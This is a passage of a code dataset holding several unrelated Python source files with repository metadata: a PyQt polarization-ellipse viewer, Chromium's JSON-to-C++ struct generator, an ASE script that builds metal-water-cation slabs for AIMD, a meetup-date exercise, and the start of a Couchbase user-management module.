self.setCentralWidget(self.main_widget)\n \n # Populate the master layout\n self.loMaster = QVBoxLayout(self.main_widget)\n self.loMaster.addLayout(self.loWaveParams)\n self.loMaster.addWidget(self.loCanvas)\n self.loMaster.addLayout(self.loRotAngle)\n self.loMaster.addLayout(self.loAuxAngle)\n self.loMaster.addLayout(self.loEllAngle)\n \n # Connect slots\n self.sldEOne.valueChanged.connect(self.OnEOneChanged)\n self.sldETwo.valueChanged.connect(self.OnETwoChanged)\n self.sldPhase.valueChanged.connect(self.OnPhaseChanged)\n self.edtEOne.editingFinished.connect(self.OnEdtEOneChanged)\n self.edtETwo.editingFinished.connect(self.OnEdtETwoChanged)\n self.edtPhase.editingFinished.connect(self.OnEdtPhaseChanged)\n \n def OnEOneChanged(self):\n EOne = self.sldEOne.value()/10\n self.edtEOne.setText(str(EOne))\n self.sldETwo.setMaximum(EOne*10-1) #####\n self.OnSomethingChanged()\n \n def OnETwoChanged(self):\n ETwo = self.sldETwo.value()/10\n self.edtETwo.setText(str(ETwo))\n self.OnSomethingChanged()\n \n def OnPhaseChanged(self):\n delta = self.sldPhase.value()/(100*pi) - 10.0\n self.edtPhase.setText(str(delta))\n self.OnSomethingChanged()\n\n def OnEdtEOneChanged(self):\n EOne = self.edtEOne.text()\n self.sldEOne.setValue(float(EOne)*10)\n \n def OnEdtETwoChanged(self):\n ETwo = self.edtETwo.text()\n self.sldETwo.setValue(float(ETwo)*10) ########\n \n def OnEdtPhaseChanged(self):\n delta = self.edtPhase.text()\n self.sldPhase.setValue((float(delta)+10.0)*pi*100.0) #######\n\n def OnSomethingChanged(self):\n\n EOne = self.sldEOne.value()/10\n ETwo = self.sldETwo.value()/10\n delta = self.sldPhase.value()/100\n # Get the rotation, auxillary, and ellipticity angles\n gammaDeg, alphaDeg, chiDeg = getAngles(EOne, ETwo, delta)\n self.lblRotAngleVal.setText(str(\"%.2f\" %(gammaDeg)))\n self.lblAuxAngleVal.setText(str(\"%.2f\" %(alphaDeg)))\n self.lblEllAngleVal.setText(str(\"%.2f\" %(chiDeg)))\n\n self.loCanvas.drawPlot(EOne,ETwo,delta)\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n MyApp = MainApp()\n MyApp.show()\n app.exec()\n", "repo_name": "xu-nuo-xu/Understanding_Optics_with_Python", "sub_path": "programs/chapter8/Listing_8-3.py", "file_name": "Listing_8-3.py", "file_ext": "py", "file_size_in_byte": 9321, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.use", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.arctan", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 31, "usage_type": "name"}, {"api_name": "numpy.arctan", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.tan", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 36, "usage_type": "name"}, {"api_name": "numpy.arcsin", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_qt5agg.FigureCanvasQTAgg", "line_number": 47, "usage_type": "name"}, {"api_name": "numpy.pi", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.figure.Figure", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_qt5agg.FigureCanvasQTAgg.__init__", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_qt5agg.FigureCanvasQTAgg", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_qt5agg.FigureCanvasQTAgg.setSizePolicy", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_qt5agg.FigureCanvasQTAgg", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_qt5agg.FigureCanvasQTAgg.updateGeometry", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_qt5agg.FigureCanvasQTAgg", "line_number": 60, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 73, "usage_type": "name"}, {"api_name": "numpy.cos", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 140, "usage_type": "name"}, {"api_name": "numpy.pi", "line_number": 163, "usage_type": "name"}, {"api_name": "numpy.pi", "line_number": 230, "usage_type": "name"}, {"api_name": "numpy.pi", "line_number": 244, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 260, "usage_type": "attribute"}]} +{"seq_id": "12309333775", "text": "import json\nfrom datetime import datetime\nimport os.path\nimport sys\nimport optparse\nimport re\n_script_path = os.path.realpath(__file__)\n\nsys.path.insert(0, os.path.normpath(_script_path + \"/../../json_comment_eater\"))\ntry:\n import json_comment_eater\nfinally:\n sys.path.pop(0)\n\nimport struct_generator\nimport element_generator\n\nHEAD = \"\"\"// Copyright %d The Chromium Authors. All rights reserved.\n// Use of this source code is governed by a BSD-style license that can be\n// found in the LICENSE file.\n\n// GENERATED FROM THE SCHEMA DEFINITION AND DESCRIPTION IN\n// %s\n// %s\n// DO NOT EDIT.\n\n\"\"\"\n\ndef _GenerateHeaderGuard(h_filename):\n \"\"\"Generates the string used in #ifndef guarding the header file.\n \"\"\"\n result = re.sub('[%s\\\\\\\\.]' % os.sep, '_', h_filename.upper())\n return re.sub('^_*', '', result) + '_' # Remove leading underscores.\n\ndef _GenerateH(basepath, fileroot, head, namespace, schema, description):\n \"\"\"Generates the .h file containing the definition of the structure specified\n by the schema.\n\n Args:\n basepath: The base directory in which files are generated.\n fileroot: The filename and path, relative to basepath, of the file to\n create, without an extension.\n head: The string to output as the header of the .h file.\n namespace: A string corresponding to the C++ namespace to use.\n schema: A dict containing the schema. See comment at the top of this file.\n description: A dict containing the description. See comment at the top of\n this file.\n \"\"\"\n\n h_filename = fileroot + '.h'\n with open(os.path.join(basepath, h_filename), 'w') as f:\n f.write(head)\n\n header_guard = _GenerateHeaderGuard(h_filename)\n f.write('#ifndef %s\\n' % header_guard)\n f.write('#define %s\\n' % header_guard)\n f.write('\\n')\n\n f.write('#include \\n')\n f.write('\\n')\n\n for header in schema.get('headers', []):\n f.write('#include \"%s\"\\n' % header)\n f.write('\\n')\n\n if namespace:\n f.write('namespace %s {\\n' % namespace)\n f.write('\\n')\n\n f.write(struct_generator.GenerateStruct(\n schema['type_name'], schema['schema']))\n f.write('\\n')\n\n for var_name, value in description.get('int_variables', {}).items():\n f.write('extern const int %s;\\n' % var_name)\n f.write('\\n')\n\n for element_name, element in description['elements'].items():\n f.write('extern const %s %s;\\n' % (schema['type_name'], element_name))\n\n if namespace:\n f.write('\\n')\n f.write('} // namespace %s\\n' % namespace)\n\n f.write('\\n')\n f.write( '#endif // %s\\n' % header_guard)\n\ndef _GenerateCC(basepath, fileroot, head, namespace, schema, description):\n \"\"\"Generates the .cc file containing the static initializers for the\n of the elements specified in the description.\n\n Args:\n basepath: The base directory in which files are generated.\n fileroot: The filename and path, relative to basepath, of the file to\n create, without an extension.\n head: The string to output as the header of the .cc file.\n namespace: A string corresponding to the C++ namespace to use.\n schema: A dict containing the schema. See comment at the top of this file.\n description: A dict containing the description. See comment at the top of\n this file.\n \"\"\"\n\n with open(os.path.join(basepath, fileroot + '.cc'), 'w') as f:\n f.write(head)\n\n f.write('#include \"%s\"\\n' % (fileroot + '.h'))\n f.write('\\n')\n\n if namespace:\n f.write('namespace %s {\\n' % namespace)\n f.write('\\n')\n\n f.write(element_generator.GenerateElements(schema['type_name'],\n schema['schema'], description))\n\n if namespace:\n f.write('\\n')\n f.write('} // namespace %s\\n' % namespace)\n\ndef _Load(filename):\n \"\"\"Loads a JSON file int a Python object and return this object.\n \"\"\"\n # TODO(beaudoin): When moving to Python 2.7 use object_pairs_hook=OrderedDict.\n with open(filename, 'r') as handle:\n result = json.loads(json_comment_eater.Nom(handle.read()))\n return result\n\ndef GenerateStruct(basepath, output_root, namespace, schema, description,\n description_filename, schema_filename, year=None):\n \"\"\"Generates a C++ struct from a JSON description.\n\n Args:\n basepath: The base directory in which files are generated.\n output_root: The filename and path, relative to basepath, of the file to\n create, without an extension.\n namespace: A string corresponding to the C++ namespace to use.\n schema: A dict containing the schema. See comment at the top of this file.\n description: A dict containing the description. See comment at the top of\n this file.\n description_filename: The description filename. This is added to the\n header of the outputted files.\n schema_filename: The schema filename. This is added to the header of the\n outputted files.\n year: Year to display next to the copy-right in the header.\n \"\"\"\n year = int(year) if year else datetime.now().year\n head = HEAD % (year, schema_filename, description_filename)\n _GenerateH(basepath, output_root, head, namespace, schema, description)\n _GenerateCC(basepath, output_root, head, namespace, schema, description)\n\nif __name__ == '__main__':\n parser = optparse.OptionParser(\n description='Generates an C++ array of struct from a JSON description.',\n usage='usage: %prog [option] -s schema description')\n parser.add_option('-b', '--destbase',\n help='base directory of generated files.')\n parser.add_option('-d', '--destdir',\n help='directory to output generated files, relative to destbase.')\n parser.add_option('-n', '--namespace',\n help='C++ namespace for generated files. e.g search_providers.')\n parser.add_option('-s', '--schema', help='path to the schema file, '\n 'mandatory.')\n parser.add_option('-o', '--output', help='output filename, ')\n (opts, args) = parser.parse_args()\n\n if not opts.schema:\n parser.error('You must specify a --schema.')\n\n description_filename = os.path.normpath(args[0])\n root, ext = os.path.splitext(description_filename)\n shortroot = opts.output if opts.output else os.path.split(root)[1]\n if opts.destdir:\n output_root = os.path.join(os.path.normpath(opts.destdir), shortroot)\n else:\n output_root = shortroot\n\n if opts.destbase:\n basepath = os.path.normpath(opts.destbase)\n else:\n basepath = ''\n\n schema = _Load(opts.schema)\n description = _Load(description_filename)\n GenerateStruct(basepath, output_root, opts.namespace, schema, description,\n description_filename, opts.schema)\n", "repo_name": "kiwibrowser/src", "sub_path": "tools/json_to_struct/json_to_struct.py", "file_name": "json_to_struct.py", "file_ext": "py", "file_size_in_byte": 6552, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2475, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.path.realpath", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 7, "usage_type": "name"}, {"api_name": "sys.path.insert", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.path.normpath", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 9, "usage_type": "name"}, {"api_name": "sys.path.pop", "line_number": 13, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.sep", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 32, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 51, "usage_type": "name"}, {"api_name": "struct_generator.GenerateStruct", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 103, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 103, "usage_type": "name"}, {"api_name": "element_generator.GenerateElements", "line_number": 113, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 125, "usage_type": "call"}, {"api_name": "json_comment_eater.Nom", "line_number": 125, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 146, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 146, "usage_type": "name"}, {"api_name": "optparse.OptionParser", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path.path.normpath", "line_number": 169, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 169, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 169, "usage_type": "name"}, {"api_name": "os.path.path.splitext", "line_number": 170, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 170, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 170, "usage_type": "name"}, {"api_name": "os.path.path.split", "line_number": 171, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 171, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 171, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 173, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 173, "usage_type": "name"}, {"api_name": "os.path.path.normpath", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path.path.normpath", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 178, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 178, "usage_type": "name"}]} +{"seq_id": "18729755750", "text": "\"\"\"Create structures that have random positions of the cation in an AIMD calculation.\"\"\"\n\nimport os\nimport sys\nimport numpy as np\nimport yaml\nfrom dataclasses import dataclass\nfrom ase import atom, build\nfrom ase import constraints\nfrom ase import Atoms\nfrom ase import data\nfrom pathlib import Path\nfrom copy import deepcopy\n\ndef get_random_xy_positions(cell, n_atoms):\n \"\"\"Get random xy positions for the cation.\"\"\"\n x_chosen = np.random.uniform(0, np.linalg.norm(cell[0]), n_atoms)\n y_chosen = np.random.uniform(0, np.linalg.norm(cell[1]), n_atoms)\n return x_chosen, y_chosen\n\ndef check_xy_distance(test_atoms, cutoff_fraction):\n \"\"\"Check if the xy positions are too close to each other.\"\"\"\n for i in range(len(test_atoms)):\n for j in range(i+1, len(test_atoms)):\n # required minimum distance is the sum of the covalent radii\n min_cutoff = data.covalent_radii[data.atomic_numbers[test_atoms[i].symbol]] + \\\n data.covalent_radii[data.atomic_numbers[test_atoms[j].symbol]]\n # Reduce the min cutoff by the cutoff fraction\n min_cutoff = min_cutoff * cutoff_fraction\n # if np.linalg.norm(test_atoms.get_positions()[i] - test_atoms.get_positions()[j]) < min_cutoff:\n if test_atoms.get_distance(i,j, mic=True) < min_cutoff:\n return False\n return True\n\ndef add_natoms_to_surface(surface, n_atoms, atoms_all, x_chosen, y_chosen, z_chosen):\n \"\"\"For a given number of atoms, and Atoms extend the original atoms object\"\"\"\n for j, n_atom in enumerate(range(n_atoms)):\n atoms_to_extend = atoms_all[j]\n # Standardize the positions\n atoms_to_extend.set_cell([1, 1, 1])\n atoms_to_extend.center()\n atoms_to_extend.set_cell([0, 0, 0])\n atoms_to_extend.rotate('y', np.random.uniform(0, 360), center='COU')\n atoms_to_extend.translate([[x_chosen[j], y_chosen[j], z_chosen]])\n\n # Rotate the molecule randomly\n surface.extend(atoms_to_extend)\n\n@dataclass\nclass CreateCation:\n \"\"\"Create structures with cations within a cell of given dimensions.\"\"\"\n yaml_file: str\n\n def __post_init__(self):\n \"\"\"Initialize class.\"\"\"\n self.yaml_file = os.path.abspath(self.yaml_file)\n # Check if all of the tags are available, and if there\n # is more or less it raises and exception.\n inputs = yaml.safe_load(open(self.yaml_file))\n\n # get the facet\n self.facet = inputs['facet']\n # get the metal atom\n self.metal_name = inputs['metal_name']\n # get the lattice constants\n self.a = inputs['a']\n # Metal layers\n self.metal_layers = int(inputs['metal_layers'])\n # get the cation\n self.cation = inputs['cation']\n # get the layer that the cation must be in \n self.layer_of_cation = inputs['layer_of_cation']\n # get the dimensions of the bulk structure\n self.dimensions = inputs['dimensions']\n # get the number of water layers\n self.water_layers = inputs['water_layers']\n # get the number of water atoms per water layer\n self.water_per_layer = inputs['water_per_layer']\n # get the distance between water layers\n self.water_layer_distance = inputs['water_layer_distance']\n # Vacuum based on the slab, important for the dipole correction\n self.vacuum = inputs['vacuum']\n # Choose a cutoff fraction to be lowered from the sum of the covalent radii\n self.cutoff_fraction = inputs['cutoff_fraction']\n\n # Check if an adsorbate is supplied\n self.adsorbate = inputs.pop('adsorbate', '')\n\n self.create_surface()\n if self.adsorbate:\n self.add_adsorbate_to_surface()\n self.create_water_and_cation()\n self.create_pre_relaxation_structures()\n\n def create_surface(self):\n \"\"\"Create the surface and fix half the layers.\"\"\"\n # create the bulk structure\n bulk = build.bulk(self.metal_name, 'fcc', a=self.a, cubic=True)\n\n # create the surface\n miller_indices = [int(a) for a in self.facet]\n surface = build.surface(bulk, indices=miller_indices, layers=self.metal_layers)\n\n # Repeat the structure\n self.dimensions = [int(a) for a in self.dimensions]\n surface.center(vacuum=self.vacuum, axis=2)\n surface = surface.repeat([self.dimensions[0], self.dimensions[1], 1])\n\n # fix the bottom half of the surface\n all_z_index = surface.get_positions()[:, 2]\n all_index = np.arange(len(all_z_index))\n mean_z_index = np.mean(all_z_index)\n bottom_z_index = all_index[all_z_index < mean_z_index]\n\n # Set the tag to 1 for things that we want to fix\n for index_fixed in bottom_z_index:\n surface[index_fixed].tag = 1\n\n # Store the position of the topmost metal atom \n self.top_metal_atom = all_index[np.argmax(all_z_index)]\n\n # Move the surface to the bottom of the cell\n surface.translate([[0, 0, -np.min(all_z_index)]])\n\n # store the surface\n self.surface = surface\n self._store_highest_positons()\n\n def constrain_atoms(self):\n \"\"\"Fix all atoms with a tag of 1\"\"\"\n fix_index = [ a for a in range(len(self.surface)) if self.surface[a].tag == 1]\n # create the constraint\n constraint = constraints.FixAtoms(indices=fix_index)\n # add the constraint to the surface\n self.surface.set_constraint(constraint)\n\n def add_adsorbate_to_surface(self):\n \"\"\"If an adsorbate is provided, add it to the surface.\"\"\"\n if self.adsorbate == 'CO2':\n co2_positions = [\n [0.00042955, 10.69278681, 10.02427761 ],\n [0.03581859, 9.53396647, 10.43134496 ],\n [-0.0347786, 11.85195424, 10.43097203 ],\n ]\n co2 = Atoms('CO2', positions=co2_positions)\n height = data.covalent_radii[data.atomic_numbers[self.metal_name]] + 0.75\n # get the position of the topmost metal atom\n position = self.surface.get_positions()[self.top_metal_atom]\n build.add_adsorbate(self.surface, co2, height=height, position = position[0:2])\n for i in range(4):\n self.surface[-i].tag = 1\n\n def _store_highest_positons(self):\n z_min = self.surface.get_positions()[:, 2].max()\n z_min += data.covalent_radii[data.atomic_numbers[self.metal_name]]\n z_min += self.water_layer_distance\n self.z_min = z_min\n print(f'Lowest possible water structure at z-coordinate {z_min} AA')\n\n def create_water_and_cation(self):\n \"\"\"Create water and cation structures that are put on top of the metal surfaces.\"\"\"\n\n # Create the water and cation atoms objects\n water = build.molecule('H2O')\n cation = Atoms(self.cation)\n\n z_min = self.z_min\n\n # Decide on the z-coordinate of the water positions\n for i, layer in enumerate(np.arange(1, self.water_layers+1, 1)):\n # Find the number of atoms placed in a layer\n n_atoms = self.water_per_layer\n if self.layer_of_cation == layer:\n atoms_all = [deepcopy(water) for n_atom in range(n_atoms-1)]\n atoms_all += [cation]\n else:\n atoms_all = [deepcopy(water) for n_atom in range(n_atoms)]\n\n # Decide on the z-coordinate of the water\n z_chosen = z_min + i * self.water_layer_distance\n x_chosen, y_chosen = get_random_xy_positions(self.surface.cell, n_atoms)\n\n # Create a copy of the atoms object to test if the xy positions are too close\n test_atoms = deepcopy(self.surface)\n\n # Add the atoms to the test_atoms\n add_natoms_to_surface(test_atoms, n_atoms, atoms_all, x_chosen, y_chosen, z_chosen)\n\n # Check if the xy positions are too close\n iteration = 0\n while not check_xy_distance(test_atoms, cutoff_fraction = self.cutoff_fraction):\n # The atoms are too close to each other, change the angles\n iteration += 1\n print(f'Iteration {iteration}')\n # Try again, with a changed angle\n test_atoms = deepcopy(self.surface)\n add_natoms_to_surface(test_atoms, n_atoms, atoms_all, x_chosen, y_chosen, z_chosen)\n if iteration > 100:\n # Create a new set of atoms\n test_atoms = deepcopy(self.surface)\n x_chosen, y_chosen = get_random_xy_positions(self.surface.cell, n_atoms)\n add_natoms_to_surface(test_atoms, n_atoms, atoms_all, x_chosen, y_chosen, z_chosen)\n if iteration > 200:\n # Give up\n raise Exception('Too many iterations')\n\n print(f'Chosen z-positions {z_chosen} AA')\n self.surface = test_atoms\n\n def create_pre_relaxation_structures(self):\n \"\"\"Create folder structure\"\"\"\n self.constrain_atoms()\n index = 1\n no_water = self.water_layers * self.water_per_layer - 1\n if self.adsorbate:\n self.metal_name = self.metal_name + '_' + self.adsorbate\n state_info = self.metal_name + '_' + self.facet + '_' + self.cation + '_' + str(self.dimensions[0]) + 'x' + str(self.dimensions[1]) + '_' + 'cationlayer_' + str(self.layer_of_cation) + '_' + str(no_water) + 'w_' + str(index)\n\n while os.path.exists(state_info):\n index += 1\n state_info = self.metal_name + '_' + self.facet + '_' + self.cation + '_' + str(self.dimensions[0]) + 'x' + str(self.dimensions[1]) + '_' + 'cationlayer_' + str(self.layer_of_cation) + '_' + str(no_water) + 'w_' + str(index)\n\n folder = os.path.join(os.getcwd(), state_info, 'pre_relaxation')\n Path(folder).mkdir(parents=True, exist_ok=True)\n self.folder = folder\n\n # Write the atoms object to that folder\n self.surface.set_pbc([True, True, True])\n self.surface.write(os.path.join(self.folder, 'pre_relaxation.traj'),)", "repo_name": "tjunewson/dipole-aimd", "sub_path": "dipole_aimd/calculation/create_cation.py", "file_name": "create_cation.py", "file_ext": "py", "file_size_in_byte": 10142, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.random.uniform", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 17, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 17, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 18, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 18, "usage_type": "attribute"}, {"api_name": "ase.data.covalent_radii", "line_number": 26, "usage_type": "attribute"}, {"api_name": "ase.data", "line_number": 26, "usage_type": "name"}, {"api_name": "ase.data.atomic_numbers", "line_number": 26, "usage_type": "attribute"}, {"api_name": "ase.data.covalent_radii", "line_number": 27, "usage_type": "attribute"}, {"api_name": "ase.data", "line_number": 27, "usage_type": "name"}, {"api_name": "ase.data.atomic_numbers", "line_number": 27, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "yaml.safe_load", "line_number": 59, "usage_type": "call"}, {"api_name": "ase.build.bulk", "line_number": 98, "usage_type": "call"}, {"api_name": "ase.build", "line_number": 98, "usage_type": "name"}, {"api_name": "ase.build.surface", "line_number": 102, "usage_type": "call"}, {"api_name": "ase.build", "line_number": 102, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 123, "usage_type": "call"}, {"api_name": "ase.constraints.FixAtoms", "line_number": 133, "usage_type": "call"}, {"api_name": "ase.constraints", "line_number": 133, "usage_type": "name"}, {"api_name": "ase.Atoms", "line_number": 145, "usage_type": "call"}, {"api_name": "ase.data.covalent_radii", "line_number": 146, "usage_type": "attribute"}, {"api_name": "ase.data", "line_number": 146, "usage_type": "name"}, {"api_name": "ase.data.atomic_numbers", "line_number": 146, "usage_type": "attribute"}, {"api_name": "ase.build.add_adsorbate", "line_number": 149, "usage_type": "call"}, {"api_name": "ase.build", "line_number": 149, "usage_type": "name"}, {"api_name": "ase.data.covalent_radii", "line_number": 155, "usage_type": "attribute"}, {"api_name": "ase.data", "line_number": 155, "usage_type": "name"}, {"api_name": "ase.data.atomic_numbers", "line_number": 155, "usage_type": "attribute"}, {"api_name": "ase.build.molecule", "line_number": 164, "usage_type": "call"}, {"api_name": "ase.build", "line_number": 164, "usage_type": "name"}, {"api_name": "ase.Atoms", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 170, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 174, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 177, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 184, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 196, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 200, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 219, "usage_type": "call"}, {"api_name": "os.path", "line_number": 219, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 223, "usage_type": "call"}, {"api_name": "os.path", "line_number": 223, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 223, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path", "line_number": 229, "usage_type": "attribute"}, {"api_name": "dataclasses.dataclass", "line_number": 49, "usage_type": "name"}]} +{"seq_id": "74716995045", "text": "from datetime import datetime, timedelta\nimport re\n\n\nclass MeetupDayException(Exception):\n pass\n\n\ndef meetup_day(year, month, weekday, named):\n count = re.sub(r'[^0-9]', '', named)\n return_date = None\n date = datetime(year, month, 1).date()\n dateinc = 0\n while date.month == month and date.year == year:\n if date.strftime('%A').lower() == weekday.lower() and date.month == month:\n dateinc += 1\n if named == 'teenth':\n if 13 <= date.day <= 19:\n return_date = date\n elif named == 'last':\n return_date = date\n elif count:\n if dateinc == int(count):\n return_date = date\n date = date + timedelta(days=1)\n if not return_date:\n raise MeetupDayException('Meetup day not found')\n return return_date\n", "repo_name": "davidejones/exercism", "sub_path": "python/meetup/meetup.py", "file_name": "meetup.py", "file_ext": "py", "file_size_in_byte": 862, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "re.sub", "line_number": 10, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "72895439846", "text": "from __future__ import annotations\n\nfrom copy import deepcopy\nfrom datetime import datetime\nfrom typing import (TYPE_CHECKING,\n Any,\n Dict,\n Iterable,\n List,\n Optional,\n Set,\n Union)\n\nfrom couchbase.auth import AuthDomain\nfrom couchbase.exceptions import (FeatureUnavailableException,\n GroupNotFoundException,\n InvalidArgumentException,\n RateLimitedException,\n UserNotFoundException)\nfrom couchbase.options import forward_args\nfrom couchbase.pycbc_core import (management_operation,\n mgmt_operations,\n user_mgmt_operations)\n\nif TYPE_CHECKING:\n from couchbase.management.options import (ChangePasswordOptions,\n DropGroupOptions,\n DropUserOptions,\n GetAllGroupsOptions,\n GetAllUsersOptions,\n GetGroupOptions,\n GetRolesOptions,\n GetUserOptions,\n UpsertGroupOptions,\n UpsertUserOptions)\n\n\nclass UserManagerLogic:\n\n _ERROR_MAPPING = {r'Unknown group.*': GroupNotFoundException,\n r'Unknown user.*': UserNotFoundException,\n r'Not found.*': FeatureUnavailableException,\n r'Method Not Allowed.*': FeatureUnavailableException,\n r'.*Limit\\(s\\) exceeded\\s+\\[.*\\].*': RateLimitedException}\n\n def __init__(self, connection):\n self._connection = connection\n\n def _get_valid_domain(self, auth_domain # type: Union[AuthDomain,str]\n ) -> str:\n if isinstance(auth_domain, str) and auth_domain in [\n \"local\", \"external\"]:\n return auth_domain\n elif isinstance(auth_domain, AuthDomain):\n return AuthDomain.to_str(auth_domain)\n else:\n raise InvalidArgumentException(message=\"Unknown Authentication Domain\")\n\n def get_user(self,\n username, # type: str\n *options, # type: GetUserOptions\n **kwargs # type: Any\n ) -> Optional[UserAndMetadata]:\n\n final_args = forward_args(kwargs, *options)\n domain = final_args.pop(\"domain_name\", \"local\")\n\n domain = self._get_valid_domain(domain)\n\n op_args = {\n \"domain\": domain,\n \"username\": username\n }\n\n mgmt_kwargs = {\n \"conn\": self._connection,\n \"mgmt_op\": mgmt_operations.USER.value,\n \"op_type\": user_mgmt_operations.GET_USER.value,\n \"op_args\": op_args\n }\n\n callback = kwargs.pop('callback', None)\n if callback:\n mgmt_kwargs['callback'] = callback\n\n errback = kwargs.pop('errback', None)\n if errback:\n mgmt_kwargs['errback'] = errback\n\n if final_args.get(\"timeout\", None) is not None:\n mgmt_kwargs[\"timeout\"] = final_args.get(\"timeout\")\n\n return management_operation(**mgmt_kwargs)\n\n def get_all_users(self,\n *options, # type: GetAllUsersOptions\n **kwargs # type: Any\n ) -> Optional[Iterable[UserAndMetadata]]:\n final_args = forward_args(kwargs, *options)\n domain = final_args.pop(\"domain_name\", \"local\")\n domain = self._get_valid_domain(domain)\n\n op_args = {\n \"domain\": domain\n }\n\n mgmt_kwargs = {\n \"conn\": self._connection,\n \"mgmt_op\": mgmt_operations.USER.value,\n \"op_type\": user_mgmt_operations.GET_ALL_USERS.value,\n \"op_args\": op_args\n }\n\n callback = kwargs.pop('callback', None)\n if callback:\n mgmt_kwargs['callback'] = callback\n\n errback = kwargs.pop('errback', None)\n if errback:\n mgmt_kwargs['errback'] = errback\n\n if final_args.get(\"timeout\", None) is not None:\n mgmt_kwargs[\"timeout\"] = final_args.get(\"timeout\")\n\n return 